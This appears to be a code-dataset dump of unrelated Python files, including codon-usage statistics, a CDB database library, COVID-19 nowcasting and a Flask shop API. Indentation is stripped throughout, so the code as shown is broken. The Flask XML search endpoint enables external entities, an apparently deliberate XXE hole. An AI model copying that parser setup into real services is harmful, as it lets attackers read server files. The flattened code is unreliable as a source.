for i in range(len(seq) // 3):
c = seq[3*i:3*(i + 1)]
if c != '---' and codon_to_aa[c] != 'Stop':
if gene in abundances:
computed_codon_usage[gi][c] += abundances[gene]
else:
computed_codon_usage[gi][c] += 1
computed_codon_usage_unw[gi][c] += 1
computed_codon_usage_groupw[gi][gene_groups[gene]][c] += 1
codons_total_gi = sum(computed_codon_usage[gi].values())
absolute_usage[gi] = {c : x / codons_total_gi for c,x in computed_codon_usage[gi].items()}
relative_usage[gi] = {}
relative_usage_unw[gi] = {}
relative_usage_groupw[gi] = {i : {} for i in range(len(groups))}
for aa in aa_codons:
aa_total_gi = 0
aa_total_unw_gi = 0
for c in list(codon_to_aa):
if codon_to_aa[c] == aa:
aa_total_gi = aa_total_gi + computed_codon_usage[gi][c]
aa_total_unw_gi = aa_total_unw_gi + computed_codon_usage_unw[gi][c]
for c in aa_codons[aa]:
try:
relative_usage[gi][c] = computed_codon_usage[gi][c] / aa_total_gi
relative_usage_unw[gi][c] = computed_codon_usage_unw[gi][c] / aa_total_unw_gi
except:
relative_usage[gi][c] = 1.0/len([c in aa_codons[aa]])
relative_usage_unw[gi][c] = 1.0/len([c in aa_codons[aa]])
for i in range(len(groups)):
aa_total_groupw_gi_i = sum(computed_codon_usage_groupw[gi][i][c] for c in aa_codons[aa])
for c in aa_codons[aa]:
if aa_total_groupw_gi_i > 0:
relative_usage_groupw[gi][i][c] \
= computed_codon_usage_groupw[gi][i][c] / aa_total_groupw_gi_i
else:
relative_usage_groupw[gi][i][c] = 0
if rerun_flag: #first run through, print general codon usage data
if verbose:
print("Writing input_codon_usage.p.gz")
with gzip.open(os.path.join(output, 'input_codon_usage.p.gz'), 'wb') as f:
pickle.dump({'groups' : groups,
'gene_groups' : gene_groups,
'overall_codon_usage' : relative_usage,
'unweighted_codon_usage' : relative_usage_unw,
'gene_group_codon_usage' : relative_usage_groupw}, f)
if verbose:
print("WARNING: Rerun analysis to compute frac-rare groups")
else: #second run through, print group codon usage data
codon_list = sorted(c for c in codon_to_aa if codon_to_aa[c] != 'Stop')
rare_codons = {}
all_rare_codons = defaultdict(int)
for gi in gis:
rare_codons[gi] = sorted(c for c in codon_list \
if israre(relative_usage[gi], rare_model, \
rare_threshold, c))
for c in rare_codons[gi]:
all_rare_codons[c] += 1
if verbose:
print("Always common codons:", ' '.join(c for c in sorted(codon_list) \
if c not in all_rare_codons))
print("Rare codons:")
for c in sorted(all_rare_codons, key=lambda y: (-all_rare_codons[y], y)):
print("%s %s %d" % (c, codon_to_aa[c], all_rare_codons[c]))
print("Writing rare_codons.dat")
with open(os.path.join(output, 'rare_codons.dat'), 'w') as f:
for gi in gis:
f.write("%s %s\n" % (gi, ','.join("%s:%5.3f" % (c, relative_usage_unw[gi][c]) \
for c in sorted(rare_codons[gi]))))
codon_list_aa_sorted = sorted(codon_list, \
key=lambda y: (codon_to_aa[y], \
relative_usage_groupw[wt_gi][len(groups)-1][y]))
if verbose:
print("Writing codon_usage.dat")
with open(os.path.join(output, 'codon_usage.dat'), 'w') as f:
f.write("# GI gene_group_index gene_group codon_index "
"amino_acid codon israre relative_usage\n")
for gi in gis:
for c in codon_list_aa_sorted:
if c in rare_codons[gi]:
israrecodon = 1
else:
israrecodon = 0
for i in range(len(gene_group_labels)):
f.write("%32s %2d %s %2d %s %s %d %6.4f\n" % \
(gi, i, gene_group_labels[i], codon_list_aa_sorted.index(c), \
codon_to_aa[c], c, israrecodon, relative_usage_groupw[gi][i][c]))
f.write("\n")
f.write("\n")
if verbose:
print("Writing codon_usage_wt.dat")
with open(os.path.join(output, 'codon_usage_wt.dat'), 'w') as f:
f.write("# GI gene_group_index gene_group codon_index "
"amino_acid codon israre relative_usage\n")
for c in codon_list_aa_sorted:
if c in rare_codons[wt_gi]:
israrecodon = 1
else:
israrecodon = 0
for i in range(len(gene_group_labels)):
f.write("%32s %2d %s %2d %s %s %d %6.4f\n" % \
(wt_gi, i, gene_group_labels[i], codon_list_aa_sorted.index(c), \
codon_to_aa[c], c, israrecodon, relative_usage_groupw[wt_gi][i][c]))
f.write("\n")
if verbose:
print("Writing codon_usage.p.gz")
with gzip.open(os.path.join(output, 'codon_usage.p.gz'), 'wb') as f:
pickle.dump({'groups' : groups,
'gene_groups' : gene_groups,
'overall_codon_usage' : relative_usage,
'unweighted_codon_usage' : relative_usage_unw,
'gene_group_codon_usage' : relative_usage_groupw}, f)
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('fasta', type=str, nargs='+', help="path to input MSA fasta file(s)")
parser.add_argument('--abundances', default=None, type=str, help="path to protein abundance file")
parser.add_argument('--output', type=str, metavar='PATH', default="", help="path to the directory into which the output should be written")
parser.add_argument('--rare-model', choices={'no_norm', 'cmax_norm'}, default='no_norm', \
help="normalization mode for defining rare codons ['no_norm']")
parser.add_argument('--rare-threshold', type=float, default=0.1, \
help="threshold for codon rarity [0.1]")
parser.add_argument('--max-len-diff', type=float, default=0.2, metavar='DIFF', \
help="maximum relative sequence-length difference compared to the WT [0.2]")
parser.add_argument('--group-dpercentile', type=int, default=10, metavar='D', \
help="percentile width for gene-group calculations [10]")
parser.add_argument('--wt-gi', type=str, default='gi|556503834|ref|NC_000913.3|', \
help="GI for WT sequence")
parser.add_argument('--gi-index', type=str, default=None, \
help="path to index of GIs versus subject titles [None]")
args = parser.parse_args()
calc_codon_usage(args.fasta, args.abundances, args.output, args.rare_model, args.rare_threshold, args.max_len_diff, args.group_dpercentile, args.wt_gi, args.gi_index)
|
10,535 | de442d9a04b55880c69ac1ddef826d1895fd3a60 | # coding=utf-8
from django.contrib import admin
from users.models import Donors
class DonorsAdmin(admin.ModelAdmin):
fieldsets = (
('Informações Básicas', {
'fields': ('name', 'address', 'number',
'complement', 'neighborhood', 'city', 'state', 'cep', )
}),
)
list_display = ['name']
search_fields = ('name',)
list_filter = ['name', 'created_at']
admin.site.register(Donors, DonorsAdmin)
|
10,536 | 0afc2ccc562263de9b3e118753bc56bb878dec3c | # CDB implemented in python ... with a pythonic interface!
# Starting point provided by Yusuke Shinyama
# Eric Ritezel -- February 17, 2007
#
# 20070218 - longstream optimization started
# there's something slow about this. low memory usage, though.
# 20070219 - had dream that led to increased performance.
#
from struct import unpack, pack
import array
# calc hash value with a given key (6.644s against 50k | 8.679s w/o psyco)
def calc_hash(string):
h = 5381
for c in array.array('B', string): h = ((h << 5) + h) ^ c
return h & 0xffffffffL
# attempt to use psyco for binding calc hash -- not a big deal
try:
from psyco import bind
bind(calc_hash)
except:pass
class reader(object):
"""
This is a reader for the CDB system from Dave Bernstein.
It is pythonic, and it doesn't follow his interface, but that's okay.
THIS IS IN NO WAY THREAD SAFE -- DO NOT DOUBT THE MIGHTY FILESYSTEM
Here's how it works:
[header] <- 256 pairs of uint32 structures [absolute offset][length]
... positioning works like this: header[hash & 0xff]
[header]
[data] <- we're jumping over this;
... each data node consists of [key_length][value_length][key][value]
[data]
[hash_lookup_table] <- there's 256 of these; they're full of babies
... each one has [hash][absolute offset]
... each is (2*entries) long for hash searches
[hash_lookup_table]
Usage:
>>> (build a cdb)
>>> read = reader("test.cdb")
>>> print 'read["a key"] =', read["a key"]
>>> for (key, value) in read.iteritems():
... print key, '= (',
... for values in value:
... print value + ',',
... print ')'
"""
def __init__(self, infile):
"""Open the file connection."""
if isinstance(infile, str): self.filep = open(infile, "r+b")
else: self.filep = infile
# attempt to read file from the start
self.filep.seek(0)
self.start = self.filep.tell()
# get the least pos_bucket position (beginning of subtables)
self.header = unpack('<512L', self.filep.read(2048))
# find the end of the data
self.enddata = min(self.header[0::2])
def __get(self,index,single=True):
return_value = []
hash_prime = calc_hash(index)
# pull data from the cached header
headhash = hash_prime % 256
pos_bucket= self.header[headhash + headhash]
ncells = self.header[headhash + headhash + 1]
# since the 256*8 bytes are all zeroed, this means the hash
# was invalid as we pulled it.
if ncells == 0: raise KeyError
# calculate predictive lookup
offset = (hash_prime >> 8) % ncells
# set a die badly flag (throw key error)
found = False
# loop through the number of cells in the hash range
for step in range(ncells):
self.filep.seek(pos_bucket + ((offset + step) % ncells) * 8)
# grab the hash and position in the data stream
(hash, pointer) = unpack('<LL', self.filep.read(8))
# throw an error if the hash just dumped us in the dirt
if pointer == 0:
# if there were no keys found, complain (else break)
if not found: raise KeyError
break
# check that the hash values check
if hash == hash_prime:
# seek to the location indicated
self.filep.seek(pointer)
# fetch the lengths of the key and value
(klen, vlen) = unpack('<LL', self.filep.read(8))
key = self.filep.read(klen)
value = self.filep.read(vlen)
# make sure that the keys match
if key == index:
return_value.append(value)
# if we're only looking for one item, break out
if single: break
# set found flag for multiple value end condition
found = True
# if there were no records hit, dump a keyerror
else: raise KeyError
# throw back a tuple of the values found for key
return tuple(return_value)
def __getitem__(self,index):
# shortcut to __get
if not isinstance(index, str): raise TypeError
self.__get(index)
def get(self,index,default=None):
try:
return self.__get(index,single=False)
except:
if default is not None: return default
raise KeyError
def has_key(self,index):
"""A simple analog of the has_key dict function."""
try:
self.__get(index)
return True
except:
return False
def iteritems(self):
"""A straight pull of the items in the cdb."""
self.filep.seek(self.start + 2048)
# iterate until we hit the enddata marker
while self.filep.tell() < self.enddata - 1:
# fetch the lengths of the key and value
(klen, vlen) = unpack('<LL', self.filep.read(8))
# yield the key and value as a tuple
yield (self.filep.read(klen), self.filep.read(vlen))
def close(self):
"""Close out the file connection."""
self.filep.close()
class builder(object):
"""
The Constant Database system is by DJB (the greatest hero on the interwub)
I just happen to implement it here bceause it's 1.fast, 2.good, 3.fast.
And I need all three aspects.
Usage:
>>> build = builder("test.cdb")
>>> build['a key'] = 'some value n for stupid'
>>> build.close()
The resultant CDB is read by any compatible lib (including reader above)
Access times are good, but can be made mucho faster with psyco.
"""
def __init__(self, infile):
if isinstance(infile, str):
self.filep = open(infile, "w+b")
else: self.filep = infile
# attempt to read file from the start
self.filep.seek(0)
self.start = self.filep.tell()
# track pointers and hash table data
self.hashbucket = [ array.array('L') for i in range(256) ]
# skip past header storage (file header + 2048)
self.position_hash = self.start + 2048
self.filep.seek(self.position_hash)
def __setitem__(self, index, value):
"""CDB supports multiple values for each key. Problems? Too bad."""
# create value and key storage
self.filep.write(pack('<LL',len(index), len(value)))
self.filep.write(index)
self.filep.write(value)
# grab a hash for the key
hash = calc_hash(index)
# dump a new hash into our bucket
self.hashbucket[hash % 256].fromlist([hash, self.position_hash])
self.position_hash += 8 + (len(index) + len(value))
def close(self):
from sys import byteorder
# preinitialize array and find byteorder
cell = array.array('L')
shouldswap = (byteorder == 'big')
# iterate completed values for the hash bucket
for hpindex in [ i for i in xrange(256) ]:
ncells = self.hashbucket[hpindex].buffer_info()[1]
if ncells <= 0:
self.hashbucket[hpindex].append(0)
continue
# create blank cell structure
cell.fromlist([ 0 for i in xrange(ncells+ncells) ])
# loop over hash pairs (xrange with parameters = fast)
for i in xrange(0, ncells, 2):
# pull hash from the hashbucket
hash = self.hashbucket[hpindex].pop(0)
# predictive lookup for jump
index = (hash >> 8) % ncells
# skip occupied cells
while cell[index+index] != 0: index = (index + 1) % ncells
# pull pointer and assign hash/pointer set to cell
cell[index+index] = hash
cell[index+index+1] = self.hashbucket[hpindex].pop(0)
# push length back onto stack
self.hashbucket[hpindex].append(ncells)
# write the hash table (swap bytes if we're bigendian)
if shouldswap: cell.byteswap()
cell.tofile(self.filep)
del cell[:]
# skip to start of file
self.filep.seek(self.start)
# dump some information about the hash pairs into the header
for i in xrange(256):
self.filep.write(pack('<LL', self.position_hash, self.hashbucket[i][0]))
self.position_hash += 8 * self.hashbucket[i].pop()
# free up the hashbucket and cell
del(cell)
del(self.hashbucket)
self.filep.close()
# a rather complete test suite
if __name__ == "__main__":
import os,sys,time
from random import randint, seed
import hotshot, hotshot.stats
# make python behave for our massive crunching needs
sys.setcheckinterval(10000)
# utility to write data
def randstr(): return "".join([ chr(randint(65,90)) for i in xrange(randint(1,32)) ])
def make_data(n):
print "TEST: Making test data"
return [ (randstr(),randstr()) for i in xrange(n)]
def test_write(testlist, fname="test.cdb"):
starttime = time.time()
# initialize a builder system for a cdb
print "TEST: Building CDB"
a = builder(fname)
# run the test
for (item,value) in testlist: a[item] = value
a['meat'] = "moo"
a['meat'] = "baa"
a['meat'] = "bow wow"
a['meat'] = "mew"
a['meat'] = "ouch"
# close the builder
a.close()
print "TEST: %fs to run build" % (time.time() - starttime)
def test_read(fname="test.cdb"):
print "TEST: Doing read of",fname
cdb = reader(fname)
print 'TEST: Should be False: cdb["not a key"] =', cdb.has_key("not a key")
if cdb.has_key("meat"):
print 'TEST: Multiple values: cdb["meat"] =', cdb.get("meat")
starttime = time.time()
print "TEST: Reconstructing keys from database"
testlist = {}
for (key, values) in cdb.iteritems(): testlist[key]=None
print "TEST: %fs to run fetch" % (time.time() - starttime)
starttime = time.time()
print "TEST: Reading",len(testlist),"entries by access key"
for slug in testlist.keys(): cdb.get(slug)
print "TEST: %fs to run fetch" % (time.time() - starttime)
cdb.close()
def test_massive(testlist, fname="stress.cdb", massive=10**5):
starttime = time.time()
print "TEST: Massive stress test for large databases (%d entries)" % massive
a = builder(fname)
for i in xrange(massive):
a[testlist[i%len(testlist)][0]] = testlist[i%len(testlist)][1]
if not i % (massive / 37): print '.', #print "%3.1f%% complete" % (float(i) / (5*(10**6))*100)
a.close()
print 'done'
print "TEST: %fs to run write" % (time.time() - starttime)
##############################################
###############TESTSUITEBLOCK#################
##############################################
data = make_data(1000)
test_massive(data, massive=10000)
del(data)
test_read(fname='stress.cdb')
exit(1)
# launch profiler test suite
prof = hotshot.Profile("pycdb.prof")
data = make_data(500000)
prof.runcall(test_write, data)
prof.runcall(test_read)
prof.runcall(test_massive, data, massive=500000, fname="stress.cdb")
prof.runcall(test_read, fname="stress.cdb", nomeat=True)
prof.close()
print "TEST: Loading hotshot stats"
stats = hotshot.stats.load("pycdb.prof")
stats.strip_dirs()
stats.sort_stats('time', 'calls')
stats.print_stats(20)
|
10,537 | 503b2c2580d35db2b5fb4ddb910142dc3d450f19 | import bcrypt
import base64
def get_log_psw_from_header(header):
base64_log_psw = header.split(' ')[1]
decoded_log_psw = base64.b64decode(base64_log_psw.encode('utf-8')).decode('utf-8')
lst_decode_log_psw = decoded_log_psw.split(':')
return lst_decode_log_psw
def check_psw(decoded_psw, psw_from_db):
check = bcrypt.checkpw(decoded_psw.encode(), psw_from_db.encode())
return check
def password_hashing(password):
hashed_psw = bcrypt.hashpw(password.encode(), bcrypt.gensalt()).decode()
return hashed_psw
|
10,538 | a72c3abb96fae528ad8cc1680e0de7f223f9bcd4 | # -*- coding: utf-8 -*-
S = 0
for i in range(100):
S += 1/(i+1)
print("%.2f" %S) |
10,539 | 88f765484a9018f4bfa96234d951d513d9795b9a | #!/usr/bin/python3
import json
import requests
import datetime
import matplotlib.pyplot
import matplotlib.dates
import math
from matplotlib import rcParams
from matplotlib.patches import Rectangle
from rpy2.robjects.packages import importr
from rpy2.robjects.vectors import DataFrame
import rpy2.robjects as robjects
last_days_not_shown = 7
now = datetime.datetime.now()
starttimestamp = datetime.datetime(2020, 3, 2, 0, 0)
days_to_present = (now - starttimestamp).days
days = [starttimestamp + datetime.timedelta(days=days_elapsed) for days_elapsed in range(days_to_present)]
# execute R script for nowcasting and retrieve results
robjects.r('source(\'./nowcasting_covid19_saxony.R\')');
ncs_df = robjects.r['ncs_df']
print(ncs_df)
nowcasting_predicted = [0] * days_to_present
nowcasting_predicted_lower = [0] * days_to_present
nowcasting_predicted_upper = [0] * days_to_present
for day_number in range(0, len(ncs_df[0])):
day = datetime.datetime(1970, 1, 1, 0, 0) + datetime.timedelta(days=int(ncs_df[0][day_number]))
days_since_start = (day - starttimestamp).days
nowcasting_predicted[days_since_start] = ncs_df[2][day_number] - ncs_df[1][day_number]
nowcasting_predicted_lower[days_since_start] = ncs_df[2][day_number] - ncs_df[3][day_number]
nowcasting_predicted_upper[days_since_start] = ncs_df[4][day_number] - ncs_df[2][day_number]
print(day, days_since_start, nowcasting_predicted[days_since_start], nowcasting_predicted_lower[days_since_start], nowcasting_predicted_upper[days_since_start])
# retrieve data for daily symtom onset numbers and imputation
def get_data_from_json_url(url, attribute_day, attribute_data):
data_json = requests.get(url)
data = json.loads(data_json.content)['features']
day_entries = [0] * days_to_present
for day_entry in data:
day_attributes = day_entry['attributes']
date = datetime.datetime.fromtimestamp(day_attributes[attribute_day] / 1000)
days_since_start = (date - starttimestamp).days
print(date.strftime('%Y-%m-%d'), day_attributes[attribute_data])
day_entries[days_since_start] = day_attributes[attribute_data]
return day_entries
def create_delay_statistics_from_json_url(url):
data_json = requests.get(url)
data = json.loads(data_json.content)['features']
day_entries = [[]] * days_to_present
for case_entry in data:
case_attributes = case_entry['attributes']
reporting_date = datetime.datetime.fromtimestamp(case_attributes['Meldedatum'] / 1000)
onset_symptoms_date = datetime.datetime.fromtimestamp(case_attributes['Refdatum'] / 1000)
reporting_delay = (reporting_date - onset_symptoms_date).days
case_count = int(case_attributes['AnzahlFall'])
days_since_start = (reporting_date - starttimestamp).days
for i in range(0, case_count):
day_entries[days_since_start].append(reporting_delay)
print(day_entries)
return day_entries
url_diagnosis_delay = 'https://services7.arcgis.com/mOBPykOjAyBO2ZKk/arcgis/rest/services/RKI_COVID19/FeatureServer/0/query?where=%28neuerfall%3D0+or+neuerfall%3D1%29+and+idbundesland%3D14+and+isterkrankungsbeginn%3D1&objectIds=&time=&resultType=none&outFields=Meldedatum%2CRefdatum%2CAnzahlFall&returnIdsOnly=false&returnUniqueIdsOnly=false&returnCountOnly=false&returnDistinctValues=false&cacheHint=false&orderByFields=Meldedatum&groupByFieldsForStatistics=&outStatistics=&having=&resultOffset=&resultRecordCount=&sqlFormat=none&f=pjson&token='
print("\nDiagnoseverzug: \n")
diagnosis_delay = create_delay_statistics_from_json_url(url_diagnosis_delay)
url_onset_symptoms = 'https://services7.arcgis.com/mOBPykOjAyBO2ZKk/arcgis/rest/services/RKI_COVID19/FeatureServer/0/query?where=%28neuerfall%3D0+or+neuerfall%3D1%29+and+idbundesland%3D14+and+isterkrankungsbeginn%3D1&objectIds=&time=&resultType=none&outFields=&returnIdsOnly=false&returnUniqueIdsOnly=false&returnCountOnly=false&returnDistinctValues=false&cacheHint=false&orderByFields=Refdatum&groupByFieldsForStatistics=Refdatum&outStatistics=%5B%0D%0A++%7B%0D%0A++++statisticType%3A+%22sum%22%2C%0D%0A++++onStatisticField%3A+%22AnzahlFall%22%2C%0D%0A++++outStatisticFieldName%3A+%22AnzahlFallSumme%22%0D%0A++%7D%0D%0A%5D&having=&resultOffset=&resultRecordCount=&sqlFormat=standard&f=pjson&token='
print("\nErkrankungsfälle: \n")
onset_symptoms = get_data_from_json_url(url_onset_symptoms, 'Refdatum', 'AnzahlFallSumme')
url_onset_symptoms_unknown = 'https://services7.arcgis.com/mOBPykOjAyBO2ZKk/arcgis/rest/services/RKI_COVID19/FeatureServer/0/query?where=%28neuerfall%3D0+or+neuerfall%3D1%29+and+idbundesland%3D14+and+isterkrankungsbeginn%3D0&objectIds=&time=&resultType=none&outFields=&returnIdsOnly=false&returnUniqueIdsOnly=false&returnCountOnly=false&returnDistinctValues=false&cacheHint=false&orderByFields=Refdatum&groupByFieldsForStatistics=Refdatum&outStatistics=%5B%0D%0A++%7B%0D%0A++++statisticType%3A+%22sum%22%2C%0D%0A++++onStatisticField%3A+%22AnzahlFall%22%2C%0D%0A++++outStatisticFieldName%3A+%22AnzahlFallSumme%22%0D%0A++%7D%0D%0A%5D&having=&resultOffset=&resultRecordCount=&sqlFormat=standard&f=pjson&token='
print("\nErkrankungsfälle mit unbekanntem Erkrankungsdatum: \n")
onset_symptoms_unknown = get_data_from_json_url(url_onset_symptoms_unknown, 'Refdatum', 'AnzahlFallSumme')
def add_imputed_case_for_day(reporting_date, delay):
onset_symptoms_date_imputed = reporting_date - delay
if onset_symptoms_date_imputed >= 0 and onset_symptoms_date_imputed < days_to_present:
onset_symptoms_imputed[onset_symptoms_date_imputed] += 1
# move unkown symptoms cases to imputed values
onset_symptoms_imputed = [0] * days_to_present
for reporting_date in range(0, len(onset_symptoms_unknown)):
delay_for_reporting_date = sorted(diagnosis_delay[reporting_date])
cases_to_impute_for_reporting_date = onset_symptoms_unknown[reporting_date]
# do a quantile imputation
for i in range (0, cases_to_impute_for_reporting_date):
quantile = (i + 0.5) / cases_to_impute_for_reporting_date
position_in_array = round(quantile * len(delay_for_reporting_date))
case_delay_for_quantile = delay_for_reporting_date[position_in_array]
add_imputed_case_for_day(reporting_date, case_delay_for_quantile)
# plot data
xticsdatetimes = []
xticslabels = []
for days_elapsed in range(days_to_present):
xticdate = starttimestamp + datetime.timedelta(days=days_elapsed)
if (xticdate.day == 1 or xticdate.day == 10 or xticdate.day == 20):
xticsdatetimes.append(xticdate)
xticslabels.append(xticdate.strftime('%d.%m.'))
dates = matplotlib.dates.date2num(days)
xticsdates = matplotlib.dates.date2num(xticsdatetimes)
onset_symptoms_reported_imputed = [ onset_symptoms[i] + onset_symptoms_imputed[i] for i in range(0, len(onset_symptoms_imputed)) ]
onset_symptoms_reported_imputed_nowcast = [ onset_symptoms[i] + onset_symptoms_imputed[i] + nowcasting_predicted[i] for i in range(0, len(onset_symptoms_imputed)) ]
fig, ax = matplotlib.pyplot.subplots()
ax.bar(dates, onset_symptoms, color='#2f86bb', label="Neuerkrankungen (gemeldetes Datum)")
ax.bar(dates, onset_symptoms_imputed, bottom=onset_symptoms, color='#5ea5cf', label="Neuerkrankungen (imputiertes Datum)")
ax.bar(dates, nowcasting_predicted, bottom=onset_symptoms_reported_imputed, color='#db855c', label="Neuerkrankungen (Nowcasting)")
ax.xaxis_date()
matplotlib.pyplot.xticks(ticks=xticsdates, labels=xticslabels, rotation='horizontal')
for tick in ax.get_xticklabels():
tick.set_fontstretch('condensed')
for label in ax.xaxis.get_ticklabels():
label.set_visible(False)
for label in ax.xaxis.get_ticklabels()[2::3]:
label.set_visible(True)
matplotlib.pyplot.legend(prop = {'stretch': 'condensed', 'size': 9}, loc='upper left')
ax.set_xlabel('Erkrankungsdatum')
ax.set_ylabel('Anzahl COVID-19-Neuerkrankungen')
matplotlib.pyplot.xlim(left=matplotlib.dates.date2num(datetime.datetime(2020, 3, 4, 12, 0)))
matplotlib.pyplot.xlim(right=matplotlib.dates.date2num(datetime.datetime(now.year, now.month, now.day, 12) - datetime.timedelta(days=last_days_not_shown)))
matplotlib.pyplot.title("Wirkung der SARS-CoV-2-Eindämmungsmaßnahmen in Sachsen")
ax.text(1.1, -0.13, 'Stand: ' + now.strftime("%d.%m.%Y, %H:%M"), verticalalignment='bottom', horizontalalignment='right', transform=ax.transAxes, fontsize=5)
ax.text(-0.14, -0.13, 'Datenquelle: Robert Koch-Institut, dl-de/by-2-0\nDarstellung: @IGrundrechte (Twitter), CC BY-SA 4.0', verticalalignment='bottom', horizontalalignment='left', transform=ax.transAxes, fontsize=5)
matplotlib.pyplot.savefig("../nowcasting_" + now.strftime("%Y-%m-%d_%H-%M") + ".png", dpi=200)
matplotlib.pyplot.savefig("../nowcasting-latest.png", dpi=200)
d = {'I': robjects.IntVector(onset_symptoms_reported_imputed_nowcast), 'dates': robjects.FloatVector(range(0,len(onset_symptoms_reported_imputed_nowcast)))}
dataf = robjects.DataFrame(d)
EpiEstim = importr('EpiEstim')
res_parametric_si = EpiEstim.estimate_R(dataf, method="parametric_si", config=EpiEstim.make_config(robjects.vectors.ListVector({'mean_si' : 5.0, 'std_si' : 1.9})))
# copy values from data frame to python arrays; omit first and last values (may be wrong)
start_index_r = 2
end_index_r = -7
mean_r = res_parametric_si[0][2][start_index_r:end_index_r]
quantile0_025_r = res_parametric_si[0][4][start_index_r:end_index_r]
quantile0_975_r = res_parametric_si[0][9][start_index_r:end_index_r]
days_for_r = [days[int(0.5 * (res_parametric_si[0][1][i] + res_parametric_si[0][0][i]))] for i in range(start_index_r, len(res_parametric_si[0][0][0:end_index_r]))]
dates_for_r = matplotlib.dates.date2num(days_for_r)
print(res_parametric_si)
ax2 = ax.twinx()
ax2.set_ylim(top=5)
ax2.set_ylabel('Effektive Reproduktionszahl') # we already handled the x-label with ax1
ax2.plot(dates_for_r, mean_r, color="#8a20a2", label="effektive Reproduktionszahl")
ax2.plot(dates_for_r, quantile0_025_r, color="#bb96c4", linewidth=0.7)
ax2.plot(dates_for_r, quantile0_975_r, color="#bb96c4", linewidth=0.7)
matplotlib.pyplot.legend(prop = {'stretch': 'condensed', 'size': 9}, loc='upper right')
matplotlib.pyplot.savefig("../nowcasting-r_" + now.strftime("%Y-%m-%d_%H-%M") + ".png", dpi=200)
matplotlib.pyplot.savefig("../nowcasting-r-latest.png", dpi=200)
|
10,540 | 8a77bce21d5d59ab57f85b1cbd6d27dd5b0162d8 | # Generated by Django 3.1.6 on 2021-02-10 11:18
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('blog', '0002_post_body'),
]
operations = [
migrations.AddField(
model_name='post',
name='mode',
field=models.BooleanField(default=False),
),
]
|
10,541 | e21f62a8dc69087c1a818920f3d2ef4c3b2e1e42 | import yaml
import xmltodict
from xml.dom import pulldom
from xml.sax import make_parser, SAXException
from xml.sax.handler import feature_external_ges
from flask import jsonify, request
from app.models import Product, Order, Item
from app.api import bp
from app.api.auth import token_required, jwt_decode_handler
from app.api.errors import error_response
@bp.route('/products', methods=['GET'])
@token_required
def products_api():
return jsonify([
{
'id': product.id,
'name': product.name,
'price': product.price,
'description': product.description,
'image': product.image,
'stock': product.stock
} for product in Product.query.limit(100).all()])
@bp.route('/products-search', methods=['POST'])
@token_required
def products_search_api():
try:
query = request.get_json().get('query')
except AttributeError:
return error_response(400)
return jsonify([
{
'id': product.id,
'name': product.name,
'price': product.price,
'description': product.description,
'image': product.image,
'stock': product.stock
} for product in Product.query.filter(
(Product.name.contains(query)) |
(Product.description.contains(query))
).limit(100).all()])
@bp.route('/products-search-yaml', methods=['POST'])
@token_required
def products_search_yaml_api():
try:
query = yaml.safe_load(request.data).get('query')
except AttributeError:
return error_response(400)
return jsonify([
{
'id': product.id,
'name': product.name,
'price': product.price,
'description': product.description,
'image': product.image,
'stock': product.stock
} for product in Product.query.filter(
(Product.name.contains(query)) |
(Product.description.contains(query))
).limit(100).all()])
@bp.route('/products-search-xml', methods=['POST'])
@token_required
def products_search_xml_api():
parser = make_parser()
parser.setFeature(feature_external_ges, True)
try:
document = pulldom.parseString(request.data.decode(), parser=parser)
str_xml = ''
for event, node in document:
if event == pulldom.START_ELEMENT:
exp = document.expandNode(node)
if exp:
str_xml += exp
str_xml += node.toxml()
data = xmltodict.parse(str_xml)
query = data.get('search').get('query')
except (SAXException, ValueError) as e:
return error_response(400, 'XML parse error - %s' % e)
except Exception as e:
return error_response(400, e)
try:
return jsonify([
{
'id': product.id,
'name': product.name,
'price': product.price,
'description': product.description,
'image': product.image,
'stock': product.stock
} for product in Product.query.filter(
(Product.name.contains(query)) |
(Product.description.contains(query))
).limit(100).all()])
except Exception as e:
return error_response(400, 'Malformed Query %s' % query)
@bp.route('/purchase-history', methods=['GET'])
@token_required
def purchase_history_api():
payload = jwt_decode_handler(
request.headers.get('Authorization').split()[1])
return jsonify([
{
'items': [
{
'id': item.id,
'name': item.name,
'quantity': item.quantity,
'price': item.price
}
for item in Item.query.filter_by(order_id=order.id).all()
],
'id': order.id,
'date': order.date,
'payment': order.payment_data,
} for order in Order.query.filter_by(
user_id=payload.get('user_id')).limit(100)])
|
10,542 | 1bf4a77ca7c5840946b4b2477faa89efb011fea5 | import
pygame.init() #pygame에 필요한 모든 모듈을 초기화 (init=초기화 메소드?)
screen = pygame.display.set_mode((1920,1080)) #게임창 크기 지정 width , height |
10,543 | 790fde6908068055c1c4ea0118ed02c2c5c0c5a6 | from itertools import permutations
from fractions import Fraction
# 1 for red
# 0 for blue
x = [1, 1, 1]
y = [0, 0, 0, 0]
# all combinations, excluded first blue
p = list(filter(lambda m: m[0] == 1, permutations(x + y, 2)))
# all combinations with second blue
e = list(filter(lambda m: m[1] == 0, p))
# result: 2/3
print(Fraction(len(e), len(p))) |
10,544 | 27757fade1c3a72fe03047c28eb821370e91b589 | from __future__ import print_function
from __future__ import division
from __future__ import print_function
from __future__ import absolute_import
import tensorflow as tf
import models_mnist
def weight_variable(shape):
initial = tf.truncated_normal(shape, stddev=0.1)
return tf.Variable(initial)
def bias_variable(shape):
initial = tf.constant(0.1, shape=shape)
return tf.Variable(initial)
def conv2d(x, W):
return tf.nn.conv2d(x, W, strides=[1, 1, 1, 1], padding='SAME')
def max_pool_2x2(x):
return tf.nn.max_pool(x, ksize=[1, 2, 2, 1],
strides=[1, 2, 2, 1], padding='SAME')
def cnn_classifier(x_image, keep_prob, name="classifier", reuse=True):
with tf.variable_scope(name, reuse=reuse):
# Convolutional layer 1
W_conv1 = weight_variable([5, 5, 1, 32])
b_conv1 = bias_variable([32])
h_conv1 = tf.nn.relu(conv2d(x_image, W_conv1) + b_conv1)
h_pool1 = max_pool_2x2(h_conv1)
# Convolutional layer 2
W_conv2 = weight_variable([5, 5, 32, 64])
b_conv2 = bias_variable([64])
h_conv2 = tf.nn.relu(conv2d(h_pool1, W_conv2) + b_conv2)
h_pool2 = max_pool_2x2(h_conv2)
# Fully connected layer 1
h_pool2_flat = tf.reshape(h_pool2, [-1, 7*7*64])
W_fc1 = weight_variable([7 * 7 * 64, 1024])
b_fc1 = bias_variable([1024])
h_fc1 = tf.nn.relu(tf.matmul(h_pool2_flat, W_fc1) + b_fc1)
# Dropout
h_fc1_drop = tf.nn.dropout(h_fc1, keep_prob)
# Fully connected layer 2 (Output layer)
W_fc2 = weight_variable([1024, 10])
b_fc2 = bias_variable([10])
